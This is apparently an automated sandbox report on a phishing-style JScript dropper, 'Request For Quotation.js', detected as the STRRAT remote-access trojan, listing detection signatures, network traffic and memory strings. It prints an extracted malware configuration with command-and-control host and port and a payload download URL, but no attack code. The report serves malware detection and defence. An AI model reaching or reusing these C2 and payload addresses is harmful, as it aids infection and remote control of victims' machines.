Windows Analysis Report
Request For Quotation.js

Overview

General Information

Sample name: Request For Quotation.js
Analysis ID: 1526387
MD5: 545558f7f19d53890a240c10a524b8c6
SHA1: 63bfcebbbba94b5dde80814e5e62daee4c176868
SHA256: 8f5a17017f6723e7f40f626f10b973c109463e431c77c5d8257150551d3d0137
Tags: jsuser-abuse_ch
Infos:

Detection

STRRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected STRRAT
JavaScript source code contains functionality to generate code involving a shell, file or stream
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected AllatoriJARObfuscator
Contains functionality to query CPU information (cpuid)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
Queries the installed Java version
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection
barindex
Found malware configuration
Source: 00000000.00000003.2061027252.00000237A8D65000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: STRRAT {"C2 list": "harold.jetos.com:3608", "url": "http://jbfrost.live/strigoi/server/?hwid=1&lid=m&ht=5", "Proxy": "harold.jetos.com:3608", "lid": "khonsari", "Startup": "false", "Secondary Startup": "true", "Scheduled Task": "true"}
Multi AV Scanner detection for domain / URL
Source: http://wshsoft.company/jv/jrex.zip Virustotal: Detection: 13% Perma Link
Multi AV Scanner detection for submitted file
Source: Request For Quotation.js Virustotal: Detection: 35% Perma Link
Source: Request For Quotation.js ReversingLabs: Detection: 26%
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49747 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49749 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49781 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49782 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49784 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49788 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49819 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49822 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49821 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49823 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49852 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49856 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49855 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49857 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49887 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49890 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49891 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49895 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49925 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49928 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49927 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49933 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49958 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49961 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49962 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49969 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49997 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49998 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49999 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:50010 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50019 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50020 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50021 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:50022 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50023 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50024 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50025 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:50026 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50027 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50028 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50029 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:50030 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50031 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50032 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50033 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:50034 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50035 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50036 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50037 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:50038 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50039 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50040 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50041 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:50042 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50043 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50044 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50045 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:50046 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50047 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50049 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50048 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:50050 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50051 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50052 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50053 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:50054 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50055 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50056 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50057 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:50058 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50059 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50060 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50061 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:50062 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50063 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50064 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50065 version: TLS 1.2

Software Vulnerabilities
barindex
JavaScript source code contains functionality to generate code involving a shell, file or stream
Source: Request For Quotation.js Return value : ['"adodb.stream"'] Go to definition
Source: Request For Quotation.js Return value : ['"adodb.stream"'] Go to definition
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 4x nop then cmp eax, dword ptr [ecx+04h] 2_2_0251CAD8
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 199.232.192.209 199.232.192.209
Source: Joe Sandbox View IP Address: 140.82.121.3 140.82.121.3
Source: Joe Sandbox View IP Address: 140.82.121.3 140.82.121.3
Source: Joe Sandbox View IP Address: 140.82.121.4 140.82.121.4
Source: Joe Sandbox View IP Address: 199.232.196.209 199.232.196.209
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 026e5ca865ce1f09da3a81d8a4e3effb
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: github.com
Source: global traffic DNS traffic detected: DNS query: repo1.maven.org
Source: javaw.exe, 00000002.00000002.3326043474.0000000009B69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bugreport.sun.com/bugreport/
Source: javaw.exe, 00000002.00000002.3326043474.0000000009BFA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3326043474.0000000009B99000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt
Source: javaw.exe, 00000002.00000002.3326043474.0000000009B99000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: javaw.exe, 00000002.00000002.3326043474.0000000009BFA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3326043474.0000000009B99000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt
Source: javaw.exe, 00000002.00000002.3326043474.0000000009B69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: javaw.exe, 00000002.00000002.3326043474.0000000009BFA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3326043474.0000000009B99000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
Source: javaw.exe, 00000002.00000002.3326043474.0000000009B99000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html
Source: javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.chambersign.org/chambersroot.crl
Source: javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl
Source: javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.securetrust.com/STCA.crl
Source: javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
Source: javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: javaw.exe, 00000002.00000002.3326043474.0000000009C04000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3326043474.0000000009B99000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl
Source: javaw.exe, 00000002.00000002.3326043474.0000000009B99000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: javaw.exe, 00000002.00000002.3326043474.0000000009C04000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3326043474.0000000009B99000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl
Source: javaw.exe, 00000002.00000002.3326043474.0000000009B69000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3326043474.0000000009B99000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: javaw.exe, 00000002.00000002.3326043474.0000000009B99000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3326043474.0000000009C0B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl
Source: javaw.exe, 00000002.00000002.3326043474.0000000009B99000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: javaw.exe, 00000002.00000002.3326043474.0000000009B99000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://java.oracle.com/
Source: javaw.exe, 00000002.00000002.3335657129.00000000150EC000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3326043474.0000000009D14000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.3131427763.000000001510D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://null.oracle.com/
Source: javaw.exe, 00000002.00000002.3326043474.0000000009BFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com
Source: javaw.exe, 00000002.00000002.3326043474.0000000009B99000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: javaw.exe, 00000002.00000002.3326043474.0000000009B99000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: javaw.exe, 00000002.00000002.3326043474.0000000009B69000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3326043474.0000000009B99000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://policy.camerfirma.com
Source: javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://policy.camerfirma.com0
Source: javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://repository.swisssign.com/
Source: javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://repository.swisssign.com/0
Source: wscript.exe, 00000000.00000003.2068025380.00000237A9DA1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2054354727.00000237A8D34000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://wshsoft.company/jv/jrex.zip
Source: wscript.exe, 00000000.00000003.2055395004.00000237A8E63000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://wshsoft.company/jv/jrex.zipleB
Source: javaw.exe, 00000002.00000002.3326043474.0000000009B95000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3326043474.0000000009B63000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.allatori.com
Source: javaw.exe, 00000002.00000002.3326043474.0000000009F97000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.chambersign.org
Source: javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.chambersign.org1
Source: javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.quovadis.bm
Source: javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3326043474.0000000009D14000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.quovadis.bm0
Source: javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.quovadisglobal.com/cps
Source: javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: javaw.exe, 00000002.00000002.3324030107.00000000049BF000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3324030107.0000000004891000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3324030107.00000000047D6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3324030107.000000000471C000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3324030107.0000000004606000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com
Source: javaw.exe, 00000002.00000002.3324030107.0000000004606000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3324030107.0000000004A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/kristian/system-hook/releases/download/3.5/system-hook-3.5.jar
Source: javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com
Source: javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3326043474.0000000009D14000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: javaw.exe, 00000002.00000002.3324030107.000000000499A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3324030107.00000000049BF000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3324030107.0000000004824000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3324030107.00000000046AB000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3324030107.00000000046D1000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3324030107.0000000004849000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3324030107.00000000048DB000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3324030107.000000000478A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3324030107.0000000004606000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3324030107.0000000004765000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3324030107.000000000486A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3324030107.0000000004900000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repo1.maven.org
Source: javaw.exe, 00000002.00000002.3324030107.0000000004900000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repo1.maven.org/maven2/net/java/dev/jna/jna-platform/5.5.0/jna-platform-5.5.0.jar
Source: javaw.exe, 00000002.00000002.3324030107.0000000004900000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repo1.maven.org/maven2/net/java/dev/jna/jna/5.5.0/jna-5.5.0.jar
Source: javaw.exe, 00000002.00000002.3326043474.0000000009B95000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3326043474.0000000009B63000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repo1.maven.org/maven2/net/java/dev/jna/jna/5.5.0/jna-5.5.0.jarplatform-5.5.0.jar
Source: javaw.exe, 00000002.00000002.3324030107.0000000004765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repo1.maven.org/maven2/org/xerial/sqlite-jdbc/3.14.2.1/sqlite-jdbc-3.14.2.1.jar
Source: javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repository.luxtrust.lu
Source: javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repository.luxtrust.lu0
Source: unknown Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50042 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50055
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50057
Source: unknown Network traffic detected: HTTP traffic on port 50059 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50061
Source: unknown Network traffic detected: HTTP traffic on port 49958 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50063
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown Network traffic detected: HTTP traffic on port 50039 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50060 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50065
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50064
Source: unknown Network traffic detected: HTTP traffic on port 50056 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50053 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50040 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50057 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50043 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50062 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49969 -> 443
